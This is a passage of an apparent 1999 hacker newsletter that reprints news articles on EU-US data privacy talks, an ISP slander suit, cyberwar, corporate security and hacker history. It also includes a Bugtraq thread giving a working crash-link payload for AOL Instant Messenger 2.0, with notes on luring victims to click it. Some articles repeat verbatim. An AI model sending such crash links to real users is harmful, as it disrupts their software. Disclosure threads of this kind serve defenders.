Specifically, the EU isn't satisfied with Aaron's proposal to allow consumers access to
data kept about them, as well as the plan's enforcement provisions.

"The Commerce Department has proposed a very vague standard for an individual's right of
access to the personal information stored about that individual," said Reidenberg.

Reidenberg co-authored a study for the European Commission on Data Protection. The
research surveyed US approaches to data privacy and electronic commerce between 1993 and
1996. Under Safe Harbor, the US proposes that consumers be granted "reasonable" access to
data kept about them. That term would likely allow firms some hedging room, but the document
states that the Europeans want unfettered access.

"The European data protection authorities find the qualifications on data-subject access
unacceptable," said Jason Catlett, who consults for American Internet companies on data practices.

"The Europeans are not going to budge on the subject of access," said Catlett. "I don't see
the United States very quickly establishing laws that protect privacy to a level that the
Europeans consider adequate."

An European Commission spokesperson could not be reached for comment.

Reidenberg said that the latest draft of Safe Harbor also reveals the US reluctance to enforce
cash remedies for victims of data privacy violations.

Such violations are growing commonplace. Last month, for example, General Motors exposed the
personal information of more than 10,000 people who entered a contest on the company's Web site.
A similar more-recent gaffe at Nissan's Web site reportedly exposed thousands of email
addresses.

"[The US proposal] continues to be lacking in remedies for victims," said Reidenberg. "It waffles
on damage awards."

By contrast, he said the directive requires that member states enact sanctions for companies that
violate the rules. While the EU does not have jurisdiction over criminal law, the directive
recommends that criminal penalties be available.

In the US, only the Federal Trade Commission has the authority to penalize data privacy
violations. It's a situation that the Online Privacy Alliance, a self-regulation lobbying group,
hopes will remain intact.

Catlett is not optimistic about the outcome of the negotiations. He compares the US attitude
toward Europe's privacy philosophy to Europeans questioning the US Constitution.

"There are going to be some tears shed across the Atlantic," Catlett said.

@HWA

21.0 Compuserve in court over slander charges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the UK: http://www.independent.co.uk/sindy/stories/D1804903.html

Dixons Sues AOL over internet arm (AOL owns Compuserve)

Worlds largest service provider faces paying damages over slanderous claims by CompuServe

By Peter Koenig and Tom Bland

Freeserve, the internet subscription service set up by Dixons in September, is suing its competitor AOL
for slander and malicious falsehood. Freeserve is also seeking a restraining injunction against its rival,
the largest internet service provider in the world.

In a writ lodged in the High Court, Freeserve alleges that customer service reps for CompuServe, which is
owned by AOL, were telling people that Freeserve's provision for free access to the net was temporary and
that its service would become fee-paying.

"At the end of 1998, Freeserve became aware that some CompuServe customers who were calling CompuServe to
cancel their subscriptions in order to transfer to Freeserve, were being told by CompuServe's customer
service personnel that they should not do so because Freeserve would be charging for its service in the
future," Dixons said in a written statement on Friday. "This was blatantly untrue."

AOL, which in Britain operates as a joint venture between the US company America Online and the German media
conglomerate Bertelsmann, says that it has responded to Freeserve's concerns. It believes the dispute will
soon be settled out of court. AOL concedes that one outstanding issue is the amount of damages it will pay.

"In January 1999, Dixons made a complaint to CompuServe claiming that CompuServe customer support staff were
giving incorrect information to its members about Dixons' Freeserve service," AOL said in a written statement
on Friday. "CompuServe did not receive any corroborated evidence to support the complaint but conducted an
immediate and thorough investigation into these allegations. This was promptly followed by an undertaking by
CompuServe that its customer support staff would not make any statements to members which could be considered
defamatory by Dixons Freeserve."

Both sides played down the gravity of the dispute. But it highlights the ferocious competition in the
mushrooming market for internet service providers. Initially, compani

  
es like AOL sought to profit by charging
fees both to subscribers and companies using the net to sell and advertise.

AOL charges £16.95 a month for unlimited access to the net. CompuServe, which aims at a more professional
audience, charges £17.

In recent weeks, however, British internet service providers have set a worldwide trend by offering access to
the net free. The strategy is to capture large numbers of net surfers and to think of them as shoppers in cyber
shopping malls.

ISPs attracting the most surfers have the best chance of selling their wares over the net, and also selling space
in their cyber-shopping malls to other companies.

Last month, booksellers WH Smith, The Sun, and HMV joined a growing number of companies offering free internet
access.

The British internet retail market is expected to grow to £3bn by 2003 from £236m last year, according to Forrester
Research.

Freeserve has 1.1 million subscribers in the UK. America Online has 17 million subscribers worldwide. In the face of
the free access phenomenon, AOL and other fee-charging ISPs like Yahoo! are seeking to differentiate themselves.

Last week Dixons, the UK's biggest electrical retailer, announced that it had appointed Credit Suisse First Boston
and Cazenove to consider a partial flotation of Freeserve.

Analysts said the exercise could value Freeserve at more than £2.5bn. Shares in Dixons hit an all-time high.

@HWA


22.0 CyberWar and NetWar
~~~~~~~~~~~~~~~~~~~
From Wired
http://www.wired.com/news/news/politics/story/19208.html

How to Fight a Cyberwar
Wired News Report

3:00 a.m. 20.Apr.99.PDT
Future terrorists will take to the Internet to pursue campaigns of disruption instead
of destruction, a new report predicts.

Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin
Laden's remote Afghan retreat is well wired: "The terrorist financier has
computers, communications equipment, and a large number of disks for data
storage."

Hamas has also taken to the Internet to exchange operational information. For
example, operatives communicate via chat rooms and email.

The report distinguishes between "cyberwar" -- a military operation -- and
"Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated
by individuals rather than countries. "Whereas cyberwar usually pits formal
military forces against each other, Netwar is more likely to involve nonstate,
paramilitary, and irregular forces."

The report, prepared for the US Air Force, recommends that the Pentagon stop
modernizing all computer systems and communications links. "Full interconnectivity
may in fact allow cyberterrorists to enter where they could not [before]," it says.

The report warns that terrorism "will focus on urban areas with strong political
and operational constraints." Translation:It's difficult for the Air Force to bomb the
bejesus out of a terrorist nest if it's in downtown New York.

Another recommendation is that the Air Force develop better spying technologies.
Instead of trying to break encryption, the military should develop "capabilities for
reading emanations" from computer monitors, perhaps through "very small,
unmanned aerial vehicles."

Other studies have reached similar conclusions about online terrorists.

"The Internet -- and the window to it, the computer terminal -- have become two of the
most important pieces of equipment in the extremists' arsenals, not only allowing them
to build membership and improve organization, but to strike alliances with people and
groups, even a decade ago, that they might never have known about or been able to easily
communicate with," says a report prepared in April 1998 for the Chemical Manufacturers
Association. The report's authors are former officials from the US Secret Service and
the CIA's counterterrorism center.

@HWA

23.0 IT Managers push for better online security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.techweb.com/wire/story/TWB19990420S0007
IT Managers Push For Better
Online Security
(04/20/99, 1:28 p.m. ET)
By Andrew Darling, InformationWeek U.K.

Senior managers remain blissfully ignorant of
the external security risks businesses are
exposed to through e-commerce applications,
choosing instead to believe firewalls alone will
provide adequate protection, said network and
security managers.

Despite predicted growth in the IT security-services
market being driven by more complex and effective
security products, network managers said senior
management -- blinded by the exciting prospect of online
transactions and distracted by operational concerns --
don't see security as a priority and remain convinced that
setting up a firewall is adequate to maintain system
integrity.

IT managers warn systems face attack from more
sophisticated macro viruses to "millennium crackpots,"
and one analyst slammed security suppliers for exposing
customers to higher risks by selling the idea of fortified
firewalls when users should be restructuring systems to
account for increased outside access.

"I've been trying to get the security issue raised at the
higher levels, but it's difficult to get executives to take
note," said Martin Bennett, group communications
architect at food and drink conglomerate Diageo. "We've
just merged and they are all very busy with that."

The Diageo group includes Guinness, United Distillers,
and Burger King and runs off a global network Bennett
accepts is increasingly susceptible to attack.

"We've got about 500 routers, which translates into
roughly 400 sites. We need to raise the issue of security
and do as much as possible to protect ourselves.
Ultimately, this means taking a framework approach, but
at the moment, we use point solutions from different
vendors," Bennett said.

"The Melissa virus was possibly one of the best things
that could have happened," said Danny Hulligan, security
manager for IT systems at Swiss Life Insurance. "The
high-profile reaction has forced senior executives to
become aware of the risk."

Beware Of The Chernobyl Virus
While Hulligan said his company had not itself been
affected by the macro virus, he expressed concern about
the "Chernobyl virus" security experts warn will hit the
e-mail community on April 26th -- the 13th anniversary
of the Russian nuclear plant's meltdown. This latest virus
is expected to attack the Bios chip, the device that
"warms up" a PC for readiness when it is switched on.

"It shows these macro viruses are going to be one of the
most serious threats. How long before the suppliers
catch up?" said Hulligan.

Both Hulligan and Bennett agree that getting the security
message across to the board is a high priority, though in
practice very difficult.

Geoff Dunn, IT director at Harvey Nash, shared their
concerns. "We should have a security policy, but we do
not. The bosses don't take it seriously enough," he said.

As business moves onto an electronic transaction-based
platform, corporate networks will have to open
themselves up to the outside world to trade and share
more information. This could leave corporates exposed to
attack as front-end and back-office systems become
more entwined.

"Senior executives are beginning to see the lucrative
potential of ecommerce, but many still do not understand
IT security implications," said Jonathan Tikochinski, an
analyst with Datamonitor's e-commerce group.

According to Tikochinski, companies could learn a lot
from the banks. "With electronic business, you
theoretically provide network access to the whole world,"
he said. "Banks have got around this problem by isolating
the online server from the back-office server and then
downloading the data overnight. The approach to
designing your infrastructure has to be different from
how it used to be."

However, he said the leading security vendors are not
interested in this. "The firewall vendors will say that is
enough, but you need to fortify the firewall, and the
vendors are worried about cannibalising their main
source of revenue," he said.

That's an accusation denied by Network Associates,
which recently launched Active Security, an enterprise
security initiative that integrates its tools with products
and services from suppliers such as Microsoft,
Hewlett-Packard, and PricewaterhouseCoopers to
create a networked environment that reacts
automatically to security breaches. The key element in
this suite is Network Associates' Event Orchestrator, a
management system that, once an attack is detected,
automatically communicates with all connected systems,
which, in turn, trigger their own protective measures,
such as a firewall restricting access to the server.

"All these products work well together," said Martin
Brown, senior security consultant at Network
Associates, in Santa Clara, Calif. "Everything's been
visual in terms of warnings, but very little happens
automatically. This is an effective secure management
solution."

Hulligan said though a warning about Melissa was
received via the Computer Emergency Response Team
website and e-mail service the day after the virus was
released, anything automated would have helped him.

IBM has also released a suite of integrated end-to-end
security solutions. SecureWay First Secure is aimed at
customers of all sizes, and who want to start doing
e-commerce but are worried about the risk to their
infrastructure.

It's a message Bennett is pleased to hear. He said there
are business pressures to develop better remote access
to the network, but he is worried by the security
implications of this. "I want more information and
advice," he said.

Security Will Improve
The security market is set to grow, despite recent
revenue slowdown because of a diversion of IT budgets
toward last-minute Y2K spending. Preliminary findings
from a soon-to- be published Datamonitor report,
Internet and Network Security, reveal the 1998
European market reached around $640 million (£400
million) and is expected to rise to $2.25 billion (£1.45
billion) by 2001.

"It's a very serious threat we have to address. With the
millennium coming up, there's going to be all sorts of
crackpots out there doing things," said Hulligan. IT Managers Push For Better
Online Security
(04/20/99, 1:28 p.m. ET)
By Andrew Darling, InformationWeek U.K.

Senior managers remain blissfully ignorant of
the external security risks businesses are
exposed to through e-commerce applications,
choosing instead to believe firewalls alone will
provide adequate protection, said network and
security managers.

Despite predicted growth in the IT security-services
market being driven by more complex and effective
security products, network managers said senior
management -- blinded by the exciting prospect of online
transactions and distracted by operational concerns --
don't see security as a priority and remain convinced that
setting up a firewall is adequate to maintain system
integrity.

IT managers warn systems face attack from more
sophisticated macro viruses to "millennium crackpots,"
and one analyst slammed security suppliers for exposing
customers to higher risks by selling the idea of fortified
firewalls when users should be restructuring systems to
account for increased outside access.

"I've been trying to get the security issue raised at the
higher levels, but it's difficult to get executives to take
note," said Martin Bennett, group communications
architect at food and drink conglomerate Diageo. "We've
just merged and they are all very busy with that."

The Diageo group includes Guinness, United Distillers,
and Burger King and runs off a global network Bennett
accepts is increasingly susceptible to attack.

"We've got about 500 routers, which translates into
roughly 400 sites. We need to raise the issue of security
and do as much as possible to protect ourselves.
Ultimately, this means taking a framework approach, but
at the moment, we use point solutions from different
vendors," Bennett said.

"The Melissa virus was possibly one of the best things
that could have happened," said Danny Hulligan, security
manager for IT systems at Swiss Life Insurance. "The
high-profile reaction has forced senior executives to
become aware of the risk."

Beware Of The Chernobyl Virus
While Hulligan said his company had not itself been
affected by the macro virus, he expressed concern about
the "Chernobyl virus" security experts warn will hit the
e-mail community on April 26th -- the 13th anniversary
of the Russian nuclear plant's meltdown. This latest virus
is expected to attack the Bios chip, the device that
"warms up" a PC for readiness when it is switched on.

"It shows these macro viruses are going to be one of the
most serious threats. How long before the suppliers
catch up?" said Hulligan.

Both Hulligan and Bennett agree that getting the security
message across to the board is a high priority, though in
practice very difficult.

Geoff Dunn, IT director at Harvey Nash, shared their
concerns. "We should have a security policy, but we do
not. The bosses don't take it seriously enough," he said.

As business moves onto an electronic transaction-based
platform, corporate networks will have to open
themselves up to the outside world to trade and share
more information. This could leave corporates exposed to
attack as front-end and back-office systems become
more entwined.

"Senior executives are beginning to see the lucrative
potential of ecommerce, but many still do not understand
IT security implications," said Jonathan Tikochinski, an
analyst with Datamonitor's e-commerce group.

According to Tikochinski, companies could learn a lot
from the banks. "With electronic business, you
theoretically provide network access to the whole world,"
he said. "Banks have got around this problem by isolating
the online server from the back-office server and then
downloading the data overnight. The approach to
designing your infrastructure has to be different from
how it used to be."

However, he said the leading security vendors are not
interested in this. "The firewall vendors will say that is
enough, but you need to fortify the firewall, and the
vendors are worried about cannibalising their main
source of revenue," he said.

That's an accusation denied by Network Associates,
which recently launched Active Security, an enterprise
security initiative that integrates its tools with products
and services from suppliers such as Microsoft,
Hewlett-Packard, and PricewaterhouseCoopers to
create a networked environment that reacts
automatically to security breaches. The key element in
this suite is Network Associates' Event Orchestrator, a
management system that, once an attack is detected,
automatically communicates with all connected systems,
which, in turn, trigger their own protective measures,
such as a firewall restricting access to the server.

"All these products work well together," said Martin
Brown, senior security consultant at Network
Associates, in Santa Clara, Calif. "Everything's been
visual in terms of warnings, but very little happens
automatically. This is an effective secure management
solution."

Hulligan said though a warning about Melissa was
received via the Computer Emergency Response Team
website and e-mail service the day after the virus was
released, anything automated would have helped him.

IBM has also released a suite of integrated end-to-end
security solutions. SecureWay First Secure is aimed at
customers of all sizes, and who want to start doing
e-commerce but are worried about the risk to their
infrastructure.

It's a message Bennett is pleased to hear. He said there
are business pressures to develop better remote access
to the network, but he is worried by the security
implications of this. "I want more information and
advice," he said.

Security Will Improve
The security market is set to grow, despite recent
revenue slowdown because of a diversion of IT budgets
toward last-minute Y2K spending. Preliminary findings
from a soon-to- be published Datamonitor report,
Internet and Network Security, reveal the 1998
European market reached around $640 million (£400
million) and is expected to rise to $2.25 billion (£1.45
billion) by 2001.

"It's a very serious threat we have to address. With the
millennium coming up, there's going to be all sorts of
crackpots out there doing things," said Hulligan.

@HWA

24.0 Hackers and Crackers "Computer Hackers America's real threat'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From corporations to universities, computer hackers are still making trouble
and breaking the law.

BY KIM KOMANDO


- White Knights And Dark Horses
- Hacker Turned Informant
- Fighting The Good Fight
- Big Daddy Mitnick
- The Internet's Role
- Life Imitates Computers, Or Vice Versa


The room in the apartment is dark and cluttered, the only light coming from the computer
monitor. Two shadowy figures sit at the computer working.

"Whew, we're in!" shouts the dirty-looking guy with the scraggly beard, pointing to
the screen.
"Wow, you actually got into personnel," the woman says in wonder, staring at the screen.
"And look," she says, "this senior vice president makes twice as much as this one does.
I bet he'd love to know about that."
The man hits a button. "He does. I just e-mailed everyone in the company."

This widely seen TV commercial for IBM business solutions paints a frightening portrait of
computer hackers at work, illegally breaking into a company's most private personnel files.
But could this actually happen in real life? Has it?

Yes, on both counts.

The history of computer hacking is a dark spiral of teenage angst. In fact, one of the first
known arrests for computer hacking targeted six teens in the Milwaukee area in 1983. The group
was accused of breaching as many as 60 computer systems, including those at the likes of the
Los Alamos National Laboratory and the Memorial Sloan-Kettering Cancer Center. One of the youths
cut a deal. The other five got probation based on the testimony of the first.

In 1987, a 17-year-old high school dropout, Herbet Zinn, was busted for hacking AT&T
omputers. During the Persian Gulf War, a band of Dutch teenagers compromised Defense Department
computers. In 1992, New York City teenagers breached the supposedly secure computers at TRW, the
National Security Agency and Bank of America. And as recently as last summer, teenage hackers from
Cloverdale, Calif., were sentenced in what Deputy Defense Secretary John Hamre characterized as
"the most organized and systematic attack the Pentagon has seen to date."

And who can forget Matthew Broderick as a NORAD-computer cracking teenager in the '80s hit
movie "War Games," and later as the attendance-record-altering Ferris Bueller in "Ferris Bueller's
Day Off"? So, when you think your kid is spending hours on his PC playing "Doom," he might
actually be hacking into your employer's computer system. It's a scary thought.

White Knights And Dark Horses

The computer-cracking culture can be broken down into four basic groups. To the general public,
the term "hacker" has come to mean someone who gains illegal access to a computer system.
However, in geekspeak, the term has a very different definition. To insiders, a hacker is merely an
avid computer enthusiast. These types often do gain access to systems they're not supposed to, but
they don't do it with ill intentions. Instead, the goal of the hacker is mental stimulation, much like
fiddling with a Rubic's Cube. The bigger the hack, the greater the bragging rights.
This isn't to say that hackers can't cause problems. In March 1998, a young hacker was caught
breaking into Bell Atlantic's computer systems. Although his intention was only to poke around, he
inadvertently disrupted the tower-to-aircraft communications for 6 hours at Worcester Airport in
Massachusetts. While no accidents resulted, it's easy to see the potential danger in this sort of
activity.
The most obvious troublemakers in this culture are termed "crackers." These are generally
misguided people with some sort of anarchist bent. They delight in breaking into systems and
fouling things up.
For example, last year, visitors to the New York Times Web site got quite a surprise. Instead of
reaching the site's home page, they were treated to a garbled manifesto by a group calling itself
HFG, or H4CK1NG F0R G1RL13Z (translation: Hacking for Girlies). In fact, our own Popular
Mechanics Web site, the PMZone, has been hacked a couple of times.
Perhaps the most dangerous contingent of the hacker corps is the one you never hear about.
These people aren't interested in fame or intellectual stimulation. They're simply in it for the money.
They hack into the computer systems at financial institutions, transfer money to different accounts
and then vanish. Sound interesting? So why do we seldom, if ever, read of such exploits? The
answer is simple: security. Financial institutions are very tight-lipped about such breaches, fearing
that any publicity will only encourage copycat offenders. They'd rather take the hit and deal with
the matter internally than trigger a potential feeding frenzy among the hacker community.
Recently, though, it seems as if the hacker community has come of age. In fact, a number of
former cyber ne'er-do-wells have begun to expend their energy and talents for the good of the
world. Some of them are motivated by profit. Others simply see themselves on a goodwill mission.

Hacker Turned Informant

Talk about a checkered past. One of Justin Petersen's first cyberexploits was assisting in the
rigging of the Pacific Bell phone system so that he and his partner would have exclusive access to
a radio station's contest line. The result: The pair won all sorts of cash, cars and other prizes. That
was in 1989.

In 1991, Petersen was busted on a number of computer-related charges, including hacking into
TRW's credit reporting system to find information that he later used to obtain bogus credit cards. But
instead of going to prison, he cut a deal and became an FBI informant in that agency's pursuit of other
criminal hackers, including Kevin Mitnick. Both during and after his service with the FBI, Petersen
committed an additional string of computer-related crimes, including the cybertheft of $150,000 from a
financial institution.

On Sept. 30, 1998, the U.S. District Court in Los Angeles issued an arrest warrant for Petersen for
parole violations. U.S. marshals found him on Dec. 11, 1998, holed up in a Studio City, Calif., apartment
that he shared with three other people. His arrest should not have been a surprise to
Petersen. One of the marshals had sent Petersen an e-mail a few days before that read, "We're coming and
hell's coming with us." Petersen read the message but didn't notice who sent it.

Fighting The Good Fight

Some hackers have chosen to use their skills for the betterment of society. Theirs is a higher cause.
Case in point: Christian Valor, a k a Se7en. Valor spent 17 years in the hacker underground, and for most
of that time he dismissed reports of online kiddie porn as exaggerated claims by overzealous lawmakers.
His suspicions were reinforced when in 1996, he spent eight weeks combing the Web for child pornography
and came up empty-handed.Then he discovered chat channels and newsgroups that catered to pedophiles and
other perverts. That was a rude awakening for Valor.

In 1997, after discovering just how low his fellow Netizens could stoop, Valor made a vow to
disrupt the online activities of kiddie porn peddlers in any way that he could legal or not. Of course,
it's highly unlikely that any child pornographer would cry foul to the authorities. And if someone were
stupid enough to turn this Robin Hood-like figure in to the police, Valor says he's been assured by the
Secret Service that they'd probably decline to take action on the matter.

Valor's first target in his new crusade was an employee of Southwestern Bell. Although the perpetrator
took numerous steps to cover his tracks, Valor was able to determine that this fellow was using his employer's
computers as home base for his kiddie porn operation. Valor claims that several days after e-mailing the
evidence to the president and network administrators at Southwestern Bell, he received a message back that the
pornographer was no longer employed there.

Valor's crusade has led other hackers to join the fight. In fact, there's even a Hackers Against Child
Pornography site that encourages others to take up their keyboards and modems against online kiddie porn
peddlers. Combined with a couple of large-scale multinational child pornography busts
that took place in 1998, maybe these cyberspace sexual misfits will think twice about their chosen "lifestyle."

Big Daddy Mitnick

No one in the history of computerdom has become more closely linked with the word "hacker" than Kevin Mitnick. At first glance, Mitnick's story
appears quite simple. Since he was 17, Mitnick had been in and out of trouble with the law over computer-related offenses. According to prosecutors,
he began a particularly active hacking spree in 1994. However, he made the fatal mistake of hacking into the San Diego Supercomputer Center and
ticking off system administrator Tsutomu Shimomura. The media portrayed Shimomura as a valiant white knight who went to great lengths to help the
FBI nail his nemesis a couple of months later in North Carolina.
Seems like a slam-dunk, doesn't it? However, a considerable amount of controversy surrounds the Mitnick case
to this day. Dectractors claim that Shimomura fabricated evidence, and that journalist John Markoff had a conflict
of interest in the matter, since he and Shimomura coauthored a book about the case that allegedly raked in a tidy
profit.
Equally disturbing was the government's handling of the case. The charges filed against Mitnick claim that he
caused more than $80 million in damages to such high-profile companies as Motorola and Nokia. However, the
companies named by the government have never publicly acknowledged any losses from any activity by Mitnick.
Furthermore, as of this writing, Mitnick has spent more than three years in prison without bail and without a
trial. That's longer than many convicted felons spend in the big house. Mitnick's supporters also claim that he has
been denied access to the evidence that is to be presented against him.
Mitnick's trial was scheduled to begin April 20, 1999. It's going to be very interesting to see how this all shakes
out.

The Internet's Role

In the early days, hacking was more difficult in some ways. For starters, covering your tracks took more work. To hide the calls you made from your
own modem, you had to be able to hack into the telephone company system and fiddle with those computers. Plus, you had to know what phone
numbers to dial. That sort of thing.
Today, however, just about every company on the planet has Internet access. And many companies maintain some sort of remote-access system
that allows employees and contractors to connect from home or the field. That means finding a company to hack is often as easy as figuring out
where on the Internet the company is located. And instead of having to disguise phone numbers, hackers find it much easier to cover any tracks they
may have laid while zigzagging the Internet in search of the perfect hack.
The Internet also has allowed the hackers of the world to develop a greater sense of community. There are dozens of Web sites and Usenet
groups devoted to hackers and the art of hacking.

Life Imitates Computers, Or Vice Versa

There have been criminals for just about as long as there have been people. And just as banks are robbed to this very day–despite tremendous
improvements in law enforcement technology–so will computers continue to be hacked and cracked for years to come. The only thing that's likely to
change is the technique.

@HWA

25.0 URL bug in AIM creates a DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 19 Apr 1999 22:00:00 -0500
From: Adam Brown <mad@SKILL.ORG>
To: BUGTRAQ@netspace.org
Subject: AOL Instant Messenger URL Crash

There is a bug in the newer versions of AOL's Instant Messenger that will
cause the client to crash when exploited. All builds of version 2.0 that
I've tested seem to be vulnerable, although I have not done extensive
version testing. AOL was notified of this about two weeks ago. To exploit
this bug, send a hyperlink in this format: aim:addbuddy?=screenname

Have fun,

SpunOne

http://www.fazed.net

http://www.webzone.net

--------------------------------------------------------------------------

Date: Tue, 20 Apr 1999 16:24:02 -0400
From: Daniel Reed <djr@NARNIA.N.ML.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: AOL Instant Messenger URL Crash

On Mon, 19 Apr 1999, Adam Brown wrote:
) There is a bug in the newer versions of AOL's Instant Messenger that will
) cause the client to crash when exploited. All builds of version 2.0 that
) I've tested seem to be vulnerable, although I have not done extensive
) version testing. AOL was notified of this about two weeks ago. To exploit
) this bug, send a hyperlink in this format: aim:addbuddy?=screenname
I just sent <a href="aim:addbuddy?=screenname">what does this show up as</a>?
to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't
know if you meant to say that the user had to click on it for the client to
crash, or if this is indeed different behaviour. I also just tried it with
"screenname" replaced with first her screenname, and then with mine, again
with no automatic reaction.

(sent from linuxkitty, a naim-0.9.4-parse2 user, to <victim>, an AOL AIM
2.0.996 user)
[15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what
does this show up as]?
[16:00:23] Friend <victim> has just logged off :(
[16:03:09] Friend <victim> is now online =)
[16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=<victim>":miaow
miaow] (don't click on that, I'm just testing something)
[16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":anoth
er test...]

--
Daniel Reed <n@ml.org>
Many a false step is made by standing still...

--------------------------------------------------------------------------

Date: Tue, 20 Apr 1999 16:34:16 -0500
From: Adam Brown <mad@skill.org>
To: BUGTRAQ@netspace.org
Subject: Re: AOL Instant Messenger URL Crash

I'm sorry if I was unclear in my first post. The only way I've seen to
exploit this is to send someone a hyperlink in the form of
aim:addbuddy?=screenname and have them click on it. (replacing "screenname"
with an actual screen name seems to give the same result) You can also set
up a web page that will redirect your victim to a client crashing URL once
they've caught on to your evil little scheme. :p I set up an example of
this at http://www.fazed.net/poof for testing purposes, of course.

Adam Brown
SpunOne@IRC
http://www.fazed.net
http://www.webzone.net

--------------------------------------------------------------------------

Date: Wed, 21 Apr 1999 14:30:40 -0400
From: Eric L. Howard <elhoward@MARKL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: AOL Instant Messenger URL Crash

I haven't been able to duplicate this on any 2.0.8* builds...I've tested about
15 different people and none in the 2.0.8* builds were affected.

All others tested were in the 2.0.9* build and died immediately, some causing
the user to have to reboot, all rendering AIM completly unable to be restarted
for several minutes after the Dr. Watson cleared on NT.

~ELH~

--------------------------------------------------------------------------

Date: Wed, 21 Apr 1999 18:14:59 -0700
From: Adam Herscher <adam@AXISPRODUCTIONS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: AOL Instant Messenger URL Crash

The problem could not be duplicated on AIM 2.0.813 (Windows 98) running IE
5.0 - Is it possible that this is in part a problem with IE 4.0?

Adam Herscher (ajh-)

--------------------------------------------------------------------------

Date: Wed, 21 Apr 1999 18:07:12 -0700
From: Adam Herscher <adam@AXISPRODUCTIONS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: AOL Instant Messenger URL Crash

>I'm sorry if I was unclear in my first post. The only way I've seen to
>exploit this is to send someone a hyperlink in the form of
>aim:addbuddy?=screenname and have them click on it. (replacing
"screenname"
>with an actual screen name seems to give the same result) You can also set
>up a web page that will redirect your victim to a client crashing URL once
>they've caught on to your evil little scheme. :p I set up an example of
>this at http://www.fazed.net/poof for testing purposes, of course.
>
>Adam Brown
>SpunOne@IRC
>http://www.fazed.net
>http://www.webzone.net


This doesn't seem to work on the Mac versions (tested 2.01.644)

Adam Herscher (ajh-)

@HWA

26.0 Shutting up Cell Phones
~~~~~~~~~~~~~~~~~~~~~~~

From dc-stuff list

I missed this one a while back, but its interesting reading, I had a site at
one time with the jammer information but have since lost the url. anyway heres
the story;

Shutting Up Cell Phones by Stewart Taggart


3:00 a.m. 26.Mar.99.PST If you want to neutralize pesky adversaries in
wartime, disrupt their communications. If you want to do the same in
peacetime, disable their mobile phones.


By selling a frequency jammer that prevents mobile-phone communications
over a limited area, an Israeli company has taken a classic
swords-to-plowshares approach in commercializing a military technology.


Picture the benefits: By silencing all the mobile phones in a restaurant,
movie theater, or concert hall, you can disconnect all those social boors
unwilling to shut off their phones themselves.


"Education, detectors, signs -- all have proven to be ineffective," says
Tammy Neufeld, spokeswoman for Netline Communications Technologies, a Tel
Aviv company that sells jammers. "Cellular phone operators are earning
billions of dollars at the expense of people's quality of life."


But in selling this unique revenge against the mobile hordes, the Israelis
are encountering a powerful adversary not seen on the battlefield:
government regulators.


On 10 March, the Australian Communications Authority banned the device in
that country, saying it could interfere with emergency services, leave
businesses' on-call personnel out of reach, and possibly interfere with
other devices.


In making its decision, the ACA said its role is to facilitate access to
spectrum, not deny it. It recommended less drastic measures in dealing with
mobile phones, such as signs, announcements, and encouraging people to use
their phone's silent messaging feature.


By emitting a kind of electromagnetic white noise, jammers prevent mobile
phones from exchanging "handshake" signals with their closest mobile-phone
tower. Within range of the jammer, the mobile-phone system is tricked into
believing that the user is out of range or has the unit switched off. The
jammer can disrupt mobile communication over an area ranging from several
meters to several kilometers.


"It's clearly a crude instrument," says Alex Nourouzi, a telecommunications
analyst with Ovum, a Sydney market research firm. "But there's definitely a
market for this as people become sick and tired of the disruptions caused
by mobile phones."


But Nourouzi says mobile-phone spectrum is like a public space that
individuals shouldn't be able to shut down on a whim. He likened it to
blocking a highway because you object to vehicle noise. He believes other
solutions will be found to the mobile phone nuisance. But for now, he
concedes, "jammers have gotten people thinking."


In Great Britain, some commuter and inter-city trains have special cars
where the phones are forbidden. They bear a metallic coating that prevents
mobile-phone transmissions -- providing some respite for train riders
wanting peace and quiet.


In the United States, mobile jammers are banned by the Federal
Communications Commission, which prohibits intentional jamming of radio
signals.


Japan's Ministry of Post and Telecommunications, however, is allowing
jammers to be tested in theaters, concert halls, cinemas, and lecture
halls, where silence is supposed to be golden.


Netline defends the jammer, saying it could prove useful in places like
hospitals or planes, where a mobile phone might pose risks to medical
equipment or flight navigation gear. Neufeld also says jammers should be
allowed on private property so homeowners can enjoy a quiet zone, safe from
the mobile's endless intrusions.


In the end, Neufeld says the jammer's hash may have to be settled in court,
or through new legislation.


"Cellular phone operators encourage people to use their cellular phones at
all times and all places without discretion," Neufeld says. "We believe
many countries are rapidly realizing that there is a need to regulate this
issue in a legal manner."
Shutting Up Cell Phones by Stewart Taggart


3:00 a.m. 26.Mar.99.PST If you want to neutralize pesky adversaries in
wartime, disrupt their communications. If you want to do the same in
peacetime, disable their mobile phones.


By selling a frequency jammer that prevents mobile-phone communications
over a limited area, an Israeli company has taken a classic
swords-to-plowshares approach in commercializing a military technology.


Picture the benefits: By silencing all the mobile phones in a restaurant,
movie theater, or concert hall, you can disconnect all those social boors
unwilling to shut off their phones themselves.


"Education, detectors, signs -- all have proven to be ineffective," says
Tammy Neufeld, spokeswoman for Netline Communications Technologies, a Tel
Aviv company that sells jammers. "Cellular phone operators are earning
billions of dollars at the expense of people's quality of life."


But in selling this unique revenge against the mobile hordes, the Israelis
are encountering a powerful adversary not seen on the battlefield:
government regulators.


On 10 March, the Australian Communications Authority banned the device in
that country, saying it could interfere with emergency services, leave
businesses' on-call personnel out of reach, and possibly interfere with
other devices.


In making its decision, the ACA said its role is to facilitate access to
spectrum, not deny it. It recommended less drastic measures in dealing with
mobile phones, such as signs, announcements, and encouraging people to use
their phone's silent messaging feature.


By emitting a kind of electromagnetic white noise, jammers prevent mobile
phones from exchanging "handshake" signals with their closest mobile-phone
tower. Within range of the jammer, the mobile-phone system is tricked into
believing that the user is out of range or has the unit switched off. The
jammer can disrupt mobile communication over an area ranging from several
meters to several kilometers.


"It's clearly a crude instrument," says Alex Nourouzi, a telecommunications
